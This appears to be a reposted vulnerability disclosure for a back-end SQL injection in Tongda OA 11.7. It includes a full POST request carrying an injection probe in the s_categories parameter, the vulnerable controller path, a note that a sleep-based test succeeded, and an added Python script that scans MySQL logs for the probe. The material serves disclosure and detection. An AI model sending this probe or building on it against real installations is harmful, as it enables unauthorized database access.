
0Day | Tongda OA (通达OA) 11.7: Back-End SQL Injection Vulnerability

2020-10-15 01:12


POST /general/appbuilder/web/report/repchart/data HTTP/1.1
UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/appbuilder/web/report/repchart?reportId=
X-ResourceType: xhr
Cookie: PHPSESSID=1kqh5um8augkhrq8q6n7t23h46; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=cb7abbef
Connection: close
Host: 192.168.202.1
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 539
x-wvs-id: Acunetix-Deepscan/288
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
content-type: application/x-www-form-urlencoded; charset=UTF-8

data_path=%5B%5D&s_categories="23fd<>select 9j@!fdf" #)&i_dataset=10&params%5BsearchParams%5D%5B0%5D%5Bid%5D=&params%5BsearchParams%5D%5B0%5D%5Bkey%5D=1598155037212&params%5BsearchParams%5D%5B0%5D%5Blabel%5D=%E5%85%AC%E5%91%8AID&params%5BsearchParams%5D%5B0%5D%5Btype%5D=text&params%5BsearchParams%5D%5B0%5D%5Bvalue%5D=&params%5BsearchParams%5D%5B0%5D%5Bscope%5D=equal&params%5BsearchParams%5D%5B0%5D%5Bmacro%5D=false&params%5BsearchParams%5D%5B0%5D%5Btype_of_data%5D=rep&params%5BsearchParams%5D%5B0%5D%5Btype_of_reports%5D=select&id=



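Proof of vulnerability:

Inspecting what the MySQL database executed, via the MySQL log file, shows that the value passed in the s_categories parameter was executed by MySQL in full, with no filtering at all, which confirms a MySQL injection vulnerability.

Vulnerable file:

webroot\general\appbuilder\modules\report\controllers\RepChartController.php

A test that calls the sleep function and comments out the rest of the statement was executed successfully.

Discovery approach:

Fuzz + SQL-log keyword matching + code audit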
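
The log-matching step of this approach, as an added example that is not part of the original post: it parses a MySQL general query log and reports whether the s_categories fuzz value from the request above reached a statement with its quotes intact. The log layout (MySQL 5.7+), the sample log lines, and the table, user and database names are constructed assumptions.

```python
import re

# Assumed general-log layout (MySQL 5.7+): "<timestamp>Z\t<thread id> <command>\t<argument>"
ENTRY = re.compile(r"^(\S+Z)\t\s*(\d+) ([A-Za-z ]+?)\t(.*)$")

FUZZ_VALUE = '"23fd<>select 9j@!fdf" #)'  # s_categories value from the request above
TOKEN = "23fd<>select 9j@!fdf"            # inner marker without the quote characters

def iter_queries(log_text):
    """Yield Query entries, joining the continuation lines of multi-line statements."""
    entry = None
    for line in log_text.splitlines() + [None]:  # None flushes the last entry
        m = ENTRY.match(line) if line is not None else None
        if line is None or m:
            if entry and entry["cmd"] == "Query":
                yield entry
            entry = m and {"ts": m[1], "thread": int(m[2]), "cmd": m[3], "sql": m[4]}
        elif entry:
            entry["sql"] += "\n" + line

def classify(sql, value=FUZZ_VALUE, token=TOKEN):
    """'verbatim': value reached SQL with quotes unescaped; 'altered': only the token did."""
    if re.search(r"(?<!\\)" + re.escape(value), sql):
        return "verbatim"
    return "altered" if token in sql else None

def scan(log_text):
    """Return (timestamp, thread id, verdict) for every statement carrying the marker."""
    hits = []
    for e in iter_queries(log_text):
        verdict = classify(e["sql"])
        if verdict:
            hits.append((e["ts"], e["thread"], verdict))
    return hits

# Constructed sample log; table, user and database names are hypothetical.
SAMPLE_LOG = "\n".join([
    "2020-10-15T01:12:03.100000Z\t   41 Connect\tdemo@localhost on demo_db",
    "2020-10-15T01:12:03.200000Z\t   41 Query\tSELECT id FROM rep_demo",
    'WHERE category IN ("23fd<>select 9j@!fdf" #) AND dataset = 10',
    "2020-10-15T01:12:04.000000Z\t   42 Query\tSELECT id FROM rep_demo WHERE label = "
    "'\\\"23fd<>select 9j@!fdf\\\" #)'",
    "2020-10-15T01:12:05.000000Z\t   42 Quit\t",
])

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A "verbatim" verdict means the quote characters arrived in the statement unescaped, which is the condition the proof above relies on; "altered" means the input was escaped or rewritten before it reached MySQL.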

Source: https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&mid=2247485947&idx=1&sn=18a9f905e3c4e937e44c90a287eaebdb
